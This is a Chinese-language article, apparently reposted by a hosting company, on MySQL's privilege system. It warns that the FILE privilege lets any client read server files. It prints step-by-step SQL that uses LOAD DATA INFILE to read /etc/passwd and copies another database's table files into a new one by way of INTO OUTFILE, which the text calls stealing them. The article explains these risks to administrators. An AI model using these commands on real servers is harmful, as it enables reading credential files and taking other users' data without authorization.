MySQL数据库的授权原则

FILE权限也可以被用来读取任何作为运行服务器的Unix用户可存取的文件。这可能被滥用，因为不仅有该服务器主机帐号的用户可以读取它们，而且有FILE权限的任何客户机也可以通过网络读取它们。你的数据库目录和系统的各种文件可能成为全球范围共享的文件！例如，通过使用LOAD DATA装载“/etc/passwd”进一个数据库表，然后它能用SELECT被读入。

下面的过程说明如何进行此项操作：

1、建具有LONGBLOB列的表：

mysql> USE test;
mysql> CREATE TABLE temp (b LONGBLOB);

2、用此表读取你要窃取的文件的内容：

mysql>LOAD DATA INFILE “/etc/passwd” INTO TABLE temp
->FIELDS ESCAPED BY  “”  LINES TERMINATED BY  “”;
mysql>SELECT * FROM temp;

3、可以这样窃取你的数据表data：

mysql>LOAD DATA INFILE“./other_db/data.frm” INTO TABLE temp
->FIELDS ESCAPED BY“”LINES TERMINATED BY“”;
mysql>SELECT * FROM temp INTO OUTFILE“./another_db/data.frm”
->FIELDS ESCAPED BY“”LINES TERMINATED BY“”;
mysql>DELETE FROM temp;
mysql>LOAD DATA INFILE“./other_db/data.MYD” INTO TABLE temp
->FIELDS ESCAPED BY“”LINES TERMINATED BY“”;
mysql>SELECT * FROM temp INTO OUTFILE“./another_db/data.MYD”
->FIELDS ESCAPED BY“”LINES TERMINATED BY“”;
mysql>DELETE FROM temp;
mysql>LOAD DATA INFILE“./other_db/data.MYI” INTO TABLE temp
->FIELDS ESCAPED BY“”LINES TERMINATED BY“”;
mysql>SELECT * FROM temp INTO OUTFILE“./another_db/data.MYI”
->FIELDS ESCAPED BY“”LINES TERMINATED BY“”;
mysql>DELETE FROM temp;

然后用户就拥有的一个新表another.data，可以对它进行完全访问。

MySQL权限系统无法完成的任务

有一些事情你不能用MySQL权限系统做到：

你不能明显地指定一个给定用户应该被拒绝存取。即，你不能明显地匹配一个用户并且然后拒绝连接。

你不能指定一个用户有权创建立或抛弃一个数据库中的表，也不能创建或抛弃数据库本身。

凌众科技专业提供服务器租用、服务器托管、企业邮局、虚拟主机等服务，公司网站：http://www.lingzhong.cn 为了给广大客户了解更多的技术信息，本技术文章收集来源于网络,凌众科技尊重文章作者的版权，如果有涉及你的版权有必要删除你的文章，请和我们联系。以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息，谢谢!